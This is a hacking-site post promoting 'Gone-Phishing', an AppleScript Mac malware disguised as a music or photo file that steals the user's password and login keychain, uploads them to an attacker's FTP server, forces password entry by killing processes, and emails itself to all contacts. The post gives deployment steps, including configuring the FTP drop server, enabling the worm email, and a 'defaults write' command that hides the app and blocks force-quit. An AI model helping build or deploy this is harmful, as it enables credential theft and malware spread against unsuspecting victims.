• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2016
  • November
  • 14
  • Gone-Phishing – Mac keychain and password stealer

Gone-Phishing – Mac keychain and password stealer

November 14, 2016July 27, 2019 Comments Off on Gone-Phishing – Mac keychain and password stealer
gone phishing hack mac password mac keychain and password stealer phishing mac passwords

A phishing app that is written in applescript. It is small and works on macs, whose users often don’t worry about malware on their computers. This makes the app more effective, especially when disguised as a music file or photo.

Here’s what it does:

  • It checks for a remote command, then creates a hidden folder in the user’s Public folder.
  • It copies a duplicate app to the hidden folder and creates a Launch Agent (to make the app start on login).
  • It prompts the user to enter their password into a dialog box. If the user doesn’t enter it within 10 seconds, the script kills all user processes, making the user have to log out in order to use the computer. image
  • If the password is entered correctly, the script copies the user’s username, password, date, WAN IP, and LAN IP to an encrypted text file in the hidden folder. image
  • If the password is not entered correctly, it forces the user to try again.
  • It uploads this file to an FTP server.
  • It copies the user’s login keychain into the same folder and uploads it to the same FTP server
  • It sends an email to all of the user’s contacts’ emails with the app attached.

 Test the script by doing the following:

If you don’t want your app to upload the text file and the keychain to an FTP server or send the email, you can just download “Ready To Use App” and unzip it.

If you do want to upload to an FTP server and/or send out the email, follow the steps below.

  1. Copy “App.applescript”, “Updater.applescript”, “DK.applescript”, and “icon.icns” to your computer.
  2. Open ‘App.applescript’ and ‘Updater.applescript’ in AppleScript Editor and find the FTP command properties.
  3. Replace the parts of the code in ‘<>’ with your information. For example:
    set myserv to "<ftp address>"
    set mypath to "</path/to/folder/>"
    

    becomes

    set myserv to "123.456.789.0"
    set mypath to "/Desktop/Passwords/"
    
  4. Optional: in App.applescript, find the comment “–send theMessage.” Remove the “–” to make this an actual command that will actually send out the email.
  5. Export “App.applescript”, “Updater.applescript”, and “DK.applescript” as run-only applications.
    • “Updater.applescript” and “DK.applescript” must be made into apps named “Updater” and “DK” respectively. You can name “App.app” whatever you want.
  6. Run the following Terminal commands with each app:
    defaults write <app path>/Contents/Info.plist 'NSUIElement' '1'
    

    (this prevents a dock icon from appearing and also makes it impossible to force quit the app)

  7. Add “icon.icns” to the resources folders of “App.app” and “Updater.app”
  8. Copy Updater.app and DK.app to the resources folder of “App.app”

 

Post navigation

Python for Hackers – Tricks and Tips
WinMACSpoofer – Windows Tool For Spoofing The Mac Address and Hostname

Related Articles

GitGraber – Monitor GitHub to search and find sensitive data in real time

- Password Attacks
October 2, 2019October 2, 2019

Emagnet – Tool to Find Leaked Databases with 97.1% Accuracy to Grab Email and Password

- Password Attacks
September 11, 2019September 11, 2019

MimiPenguin – Tool to Dump Linux Login Password

- Password Attacks
July 25, 2019
hacker gadgets
hacker phone covers

Recent Posts

Seekr: multi-purpose toolkit for gathering and managing OSINT Data

Seekr: multi-purpose toolkit for gathering and managing OSINT Data

February 7, 2023
reportly: AzureAD user activity report tool

reportly: AzureAD user activity report tool

February 7, 2023
PoC Exploit For GoAnywhere MFT 0-Day Flaw (CVE-2023-0669) Published Online

PoC Exploit For GoAnywhere MFT 0-Day Flaw (CVE-2023-0669) Published Online

February 7, 2023
FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis

FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis

February 6, 2023
Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C

Heap_Detective – The Simple Way To Detect Heap Memory Pitfalls In C++ And C

February 6, 2023
OneNoteAnalyzer: analyzing malicious OneNote documents

OneNoteAnalyzer: analyzing malicious OneNote documents

February 6, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Join Our Community!

Please wait...
Get the latest News and Hacking Tools delivered to your inbox.
Don't Worry ! You will not be spammed

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW